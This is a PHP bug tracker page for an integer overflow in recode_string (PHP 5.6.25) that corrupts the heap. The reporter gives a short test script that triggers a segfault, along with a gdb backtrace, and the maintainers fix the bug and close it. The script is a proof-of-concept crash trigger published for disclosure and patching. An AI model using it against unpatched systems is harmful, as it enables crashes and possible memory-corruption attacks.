|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #73016 integer overflow in recode_string caused heap corruption
Submitted: 2016-09-05 02:12 UTC Modified: 2017-02-13 01:25 UTC
From: minhrau dot vc dot 365 at gmail dot com Assigned: stas (profile)
Status: Closed Package: Recode related
PHP Version: 5.6.25 OS: ALL
Private report: No CVE-ID: None
 [2016-09-05 02:12 UTC] minhrau dot vc dot 365 at gmail dot com
Integer overflow in function recode_string lead to heap corruption. Please check comment below:

	char *r = NULL;
	size_t r_len = 0, r_alen = 0;
	int req_len, str_len;
	char *req, *str;
	recode_buffer_to_buffer(request, str, str_len, &r, &r_len, &r_alen); //this function create return buffer with length > INT_MAX
	} else {
		RETVAL_STRINGL(r, r_len, 1); 



Test script:

ini_set('memory_limit', -1);

$str = str_repeat('>', 0xffffffff/6);


$str1 = recode_string("utf-8..html", $str);

chunk_split($str1, 11, $str1);

Expected result:
No Crash

Actual result:
Starting program: /home/minhrau/PHP-5.6.25/sapi/cli/php ~/phptestcase/testrecode.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff11ff9a4 in __memmove_avx_unaligned_erms () from /usr/lib/
(gdb) bt
#0  0x00007ffff11ff9a4 in __memmove_avx_unaligned_erms () from /usr/lib/
#1  0x000000000084a05d in zif_chunk_split (ht=3, return_value=0x7ffff7fa1ec0, return_value_ptr=0x7ffff7f6c0d8, this_ptr=0x0, return_value_used=0) at /home/minhrau/PHP-5.6.25/ext/standard/string.c:2218
#2  0x00000000009ba153 in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f6c270) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:558
#3  0x00000000009c1d83 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f6c270) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:2602
#4  0x00000000009b8646 in execute_ex (execute_data=0x7ffff7f6c270) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:363
#5  0x00000000009b9032 in zend_execute (op_array=0x7ffff7fa08d8) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:388
#6  0x0000000000974532 in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/minhrau/PHP-5.6.25/Zend/zend.c:1341
#7  0x00000000008e548e in php_execute_script (primary_file=0x7fffffffe290) at /home/minhrau/PHP-5.6.25/main/main.c:2613
#8  0x0000000000a972b4 in do_cli (argc=2, argv=0x136a960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:994
#9  0x0000000000a98302 in main (argc=2, argv=0x136a960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:1378


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-05 05:22 UTC]
-Assigned To: +Assigned To: stas
 [2016-09-05 05:22 UTC]
The fix is in security repo as aec5ab899f9de6cf11ded9c77b649b34f5fcb643 and in

please verify
 [2016-09-05 05:26 UTC] minhrau dot vc dot 365 at gmail dot com
Patch looks good.

can i request cve for this?
 [2016-09-13 04:12 UTC]
-Status: Assigned +Status: Closed
 [2016-09-13 04:12 UTC]
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at

 For Windows:
Thank you for the report, and for helping us make PHP better.

 [2017-02-13 01:25 UTC]
-Type: Security +Type: Bug
PHP Copyright © 2001-2023 The PHP Group
All rights reserved.
Last updated: Sat Mar 25 10:04:09 2023 UTC